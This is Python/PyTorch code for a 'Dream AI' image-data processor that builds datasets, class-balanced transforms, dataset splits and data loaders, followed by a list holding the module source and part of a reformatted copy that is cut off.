transforms.Lambda(lambda crops:torch.stack( 
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops])) ])} # tta_tfms = {self.tr_name: transforms.Compose([ # transforms.Resize(s), # transforms.ToTensor(), # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # ]), # self.val_name: transforms.Compose([ # transforms.Resize(s), # transforms.ToTensor(), # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # ]) } else: tta_tfms = None if not bal_tfms: bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()], self.val_name: None, self.test_name: None } else: bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None} if obj: resize_transform = transforms.Resize(s) else: # resize_transform = transforms.RandomResizedCrop(s[0]) resize_transform = transforms.Resize(s) if not tfms: tfms = [ resize_transform, transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ] else: tfms_temp = [ resize_transform, transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ] tfms_temp[1:1] = tfms tfms = tfms_temp print(tfms) data_transforms = { self.tr_name: tfms, self.val_name: [ # transforms.Resize(s[0]+50), # transforms.CenterCrop(s[0]), transforms.Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ], self.test_name: [ # transforms.Resize(s[0]+50), # transforms.CenterCrop(s[0]), transforms.Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ] } temp_tfms = [resize_transform, transforms.ToTensor()] temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms) self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage) data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std if balance: image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x], data_transforms[x],obj,minorities,class_diffs,bal_tfms[x]) for x in [self.tr_name, self.val_name, self.test_name]} else: image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x], data_transforms[x],obj) for x in [self.tr_name, self.val_name, self.test_name]} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs, shuffle=True, num_workers=num_workers) for x in [self.tr_name, self.val_name, self.test_name]} dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]} self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders, dataset_sizes) return image_datasets,dataloaders,dataset_sizes def imshow(self,inp, title=None): """Imshow for Tensor.""" inp = self.denorm_img(inp) plt.imshow(inp) if title: plt.title(title) plt.pause(0.001) def denorm_img(self,inp,calculate = False): inp = inp.numpy().transpose((1, 2, 0)) if calculate: mean = np.mean(inp) std = np.std(inp) else: mean = self.img_mean.numpy() std = self.img_std.numpy() inp = std * inp + mean inp = np.clip(inp, 0, 1) return inp def show_data(self,folder_name = 'train', size = (64,64), bs = 5): self.get_data(size,bs) batch = next(iter(self.dataloaders[folder_name])) inputs, classes = batch[0],batch[1] out = torchvision.utils.make_grid(inputs) if self.reg: print(classes) 
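            # regression: grid titles are the raw target values rather than class names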
self.imshow(out, title=[x for x in classes]) elif self.multi_label: self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes]) else: self.imshow(out, title=[self.class_names[x] for x in classes]) # def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12): # # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}' # # .format(anc_grids,anc_zooms,anc_ratios)) # # print('If so, you may call the function "set_up_object_detection" with your own paramteres.') # cmap = get_cmap(num_colr) # self.colr_list = [cmap(float(x)) for x in range(num_colr)] # self.num_colr = num_colr # self.create_anchors(anc_grids,anc_zooms,anc_ratios) # self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.) # self.loss_f = FocalLoss(self.num_classes) # def create_anchors(self,anc_grids,anc_zooms,anc_ratios): # anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios] # k = len(anchor_scales) # anc_offsets = [1/(o*2) for o in anc_grids] # anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag) # for ao,ag in zip(anc_offsets,anc_grids)]) # anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag) # for ao,ag in zip(anc_offsets,anc_grids)]) # anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0) # anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales]) # for ag in anc_grids]) # grid_sizes = torch.tensor(np.concatenate([np.array( # [ 1/ag for i in range(ag*ag) for o,p in anchor_scales]) # for ag in anc_grids])).float().unsqueeze(1).to(self.device) # anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device) # anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:]) # self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k
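# --- usage sketch (illustrative; not part of the original module) ---
# Assumes a ./data directory containing a train/ folder of per-class image
# subfolders; val/test splits and CSVs are generated by set_up_data if absent.
# Note: show_data() passes (size, bs) positionally into get_data(), whose first
# parameter is data_dict -- an apparent bug, so get_data() is called directly here.
if __name__ == '__main__':
    dp = DataProcessor(data_path='data')
    image_datasets, dataloaders, dataset_sizes = dp.get_data(s=(224, 224), bs=32, balance=True)
    xb, yb = next(iter(dataloaders[dp.tr_name]))
    print(dataset_sizes, xb.shape)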
[ "from dai_imports import*\nfrom obj_utils import*\nimport utils\n\nclass my_image_csv_dataset(Dataset):\n \n def __init__(self, data_dir, data, transforms_ = None, obj = False,\n minorities = None, diffs = None, bal_tfms = None):\n \n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n\n img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)\n\n y = self.data.iloc[index, 1] \n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms \n self.tfms = transforms.Compose(self.transforms_)\n # print(self.tfms)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else: \n self.tfms = transforms.Compose(self.transforms_) \n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s,tuple):\n s = s[0]\n row_scale = s/img.size[0]\n col_scale = s/img.size[1]\n y = rescale_bbox(y,row_scale,col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = (y,y2)\n return (x,y)\n\n\nclass my_image_folder(DatasetFolder):\n \n def __init__(self, root, transform=None, target_transform=None,\n loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):\n \n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self,index):\n \n path, target = self.samples[index] \n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self.transform )\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else: \n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\ndef extract_data(dt):\n\n x = []\n y = []\n for a,b in dt:\n x.append(a)\n y.append(b)\n return x,y\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)] \n\ndef get_minorities(df,thresh=0.8):\n\n c = df.iloc[:,1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [1-(x/max_count) for x in lc]\n diffs = dict((k,v) for k,v in zip(c.keys(),diffs))\n minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]\n return minorities,diffs\n\ndef csv_from_path(path, img_dest):\n\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n 
tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name,name)\n new_path = img_dest/new_name\n# print(new_path)\n os.rename(i,new_path)\n tr_images.append(new_name)\n tr_labels.append(label) \n # os.rmdir(l)\n tr_img_label = {'Img':tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\ndef add_extension(a,e):\n a = [x+e for x in a]\n return a\n\ndef one_hot(targets, multi = False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot,binerizer.classes_\n\ndef get_index(arr,a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\ndef rescale_bbox(bb,row_scale,col_scale):\n bb = bb.reshape((-1,4))\n for b in bb:\n r1,c1,r2,c2 = b\n b[0] = int(np.round(r1*col_scale))\n b[1] = int(np.round(c1*row_scale))\n b[2] = int(np.round(r2*col_scale))\n b[3] = int(np.round(c2*row_scale))\n\n # bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])\n # for b in bb:\n # r1,c1,r2,c2 = b\n # b[0] = int(np.round(r1*row_scale))\n # b[1] = int(np.round(c1*col_scale))\n # b[2] = int(np.round(r2*row_scale))\n # b[3] = int(np.round(c2*col_scale))\n # if(sum(b)) == 1:\n # b[0],b[1],b[2],b[3] = 0,0,0,0\n\n bb = bb.reshape((1,-1)) \n return bb\n\ndef get_img_stats(dataset,sz):\n\n size = int(len(dataset)*sz)\n i = 0\n imgs = []\n for img,_ in dataset:\n # print(img.size())\n if i > size:\n break\n imgs.append(img)\n i+=1\n imgs_ = torch.stack(imgs,dim=3)\n imgs_ = imgs_.view(3,-1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean,imgs_std\n\ndef split_df(train_df,test_size = 0.15):\n try: \n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1])\n except:\n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2)\n train_df = train_df.reset_index(drop = True)\n val_df = val_df.reset_index(drop = True)\n return train_df,val_df \n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\nclass DataProcessor:\n \n def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,\n tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):\n \n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n \n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n \n self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,\n val_csv,reg,tr_name,val_name,test_name,extension)\n \n self.obj = False\n self.multi_label = False\n \n if setup_data:\n self.set_up_data()\n \n def set_up_data(self,split_size = 0.15):\n\n data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)\n\n # check if paths given and also set paths\n \n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path,tr_name)\n val_path = 
os.path.join(data_path,val_name)\n test_path = os.path.join(data_path,test_name)\n\n if os.path.exists(os.path.join(data_path,tr_name+'.csv')):\n train_csv = tr_name+'.csv'\n # if os.path.exists(os.path.join(data_path,val_name+'.csv')):\n # val_csv = val_name+'.csv'\n # if os.path.exists(os.path.join(data_path,test_name+'.csv')):\n # test_csv = test_name+'.csv' \n\n # paths to csv\n\n if not train_csv:\n print('no')\n train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path)\n\n train_csv_path = os.path.join(data_path,train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True \n img_names = [str(x) for x in list(train_df.iloc[:,0])]\n if self.extension:\n img_names = add_extension(img_names,self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path,val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str,list(val_df.iloc[:,1])))\n if test_csv:\n test_csv_path = os.path.join(data_path,test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str,list(test_df.iloc[:,1]))) \n targets = list(map(str,list(train_df.iloc[:,1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n\n # bounding boxes\n\n int_targets = [list(map(float,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n\n # one-hot classes\n\n obj_targets = list(map(str,list(train_df.iloc[:,2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int,x)) for x in obj_split_targets]\n except:\n pass\n dai_onehot,onehot_classes = one_hot(obj_split_targets,True)\n # train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n\n # class indexes\n\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]\n zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)\n # print(zero_idx.shape)\n for i,t in enumerate(zero_idx):\n # temp_l = len(class_idx[i])\n # if temp_l > 90:\n # print(i,temp_l)\n t[len(t)-len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n # self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])\n\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int,x)) for x in split_targets]\n except:\n pass\n dai_onehot,onehot_classes = 
one_hot(split_targets,self.multi_label)\n train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:,1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:,1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:,1] = target_ids \n self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets\n\n # self.models_path = os.path.join(self.data_dir, 'models')\n # os.makedirs(self.models_path,exist_ok=True)\n\n if not val_csv:\n train_df,val_df = split_df(train_df,split_size)\n if not test_csv: \n val_df,test_df = split_df(val_df,split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:,0])]\n val_images = [str(x) for x in list(val_df.iloc[:,0])]\n test_images = [str(x) for x in list(test_df.iloc[:,0])]\n if self.extension:\n tr_images = add_extension(tr_images,self.extension)\n val_images = add_extension(val_images,self.extension)\n test_images = add_extension(test_images,self.extension)\n train_df.iloc[:,0] = tr_images\n val_df.iloc[:,0] = val_images\n test_df.iloc[:,0] = test_images\n train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)\n val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)\n test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)\n self.minorities,self.class_diffs = None,None\n if (not self.obj) or (not self.multi_label):\n self.minorities,self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}\n data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,\n 'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}\n # save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None):\n \n train_df = csv_from_path(tr_path,tr_path)\n train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',None)\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path,tr_path)\n val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',self.val_name+'.csv')\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path,tr_path)\n test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv') \n return ret\n \n def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,\n bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):\n \n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],\n data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])\n if obj or multi_label:\n balance = False \n if 
tta:\n tta_tfms = {self.tr_name: transforms.Compose( \n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]), \n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n \n ]),\n self.val_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ]),\n self.test_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ])}\n# tta_tfms = {self.tr_name: transforms.Compose([\n# transforms.Resize(s),\n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]),\n# self.val_name: transforms.Compose([\n# transforms.Resize(s), \n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]) }\n \n else:\n tta_tfms = None\n \n if not bal_tfms:\n bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],\n \n self.val_name: None,\n self.test_name: None \n }\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n # resize_transform = transforms.RandomResizedCrop(s[0])\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n else:\n \n tfms_temp = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n \n data_transforms = {\n self.tr_name: tfms,\n self.val_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ],\n self.test_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n }\n\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms)\n self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage)\n data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std\n\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])\n for x in [self.tr_name, self.val_name, self.test_name]} \n else:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj)\n for x in [self.tr_name, self.val_name, 
self.test_name]}\n \n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,\n shuffle=True, num_workers=num_workers)\n for x in [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}\n \n self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,\n dataset_sizes)\n \n return image_datasets,dataloaders,dataset_sizes\n\n def imshow(self,inp, title=None):\n \n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self,inp,calculate = False):\n\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else: \n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp \n \n def show_data(self,folder_name = 'train', size = (64,64), bs = 5):\n \n self.get_data(size,bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0],batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes]) \n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes]) \n else: \n self.imshow(out, title=[self.class_names[x] for x in classes])\n\n # def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):\n\n # # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}'\n # # .format(anc_grids,anc_zooms,anc_ratios))\n # # print('If so, you may call the function \"set_up_object_detection\" with your own paramteres.')\n\n # cmap = get_cmap(num_colr)\n # self.colr_list = [cmap(float(x)) for x in range(num_colr)]\n # self.num_colr = num_colr\n # self.create_anchors(anc_grids,anc_zooms,anc_ratios)\n # self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)\n # self.loss_f = FocalLoss(self.num_classes)\n\n # def create_anchors(self,anc_grids,anc_zooms,anc_ratios):\n \n # anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]\n # k = len(anchor_scales)\n # anc_offsets = [1/(o*2) for o in anc_grids]\n # anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)\n # anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])\n # grid_sizes = torch.tensor(np.concatenate([np.array(\n # [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])).float().unsqueeze(1).to(self.device)\n # anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)\n # anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])\n # self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k \n\n\n\n\n\n\n\n\n", "from dai_imports import *\nfrom obj_utils import *\nimport utils\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n 
self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs 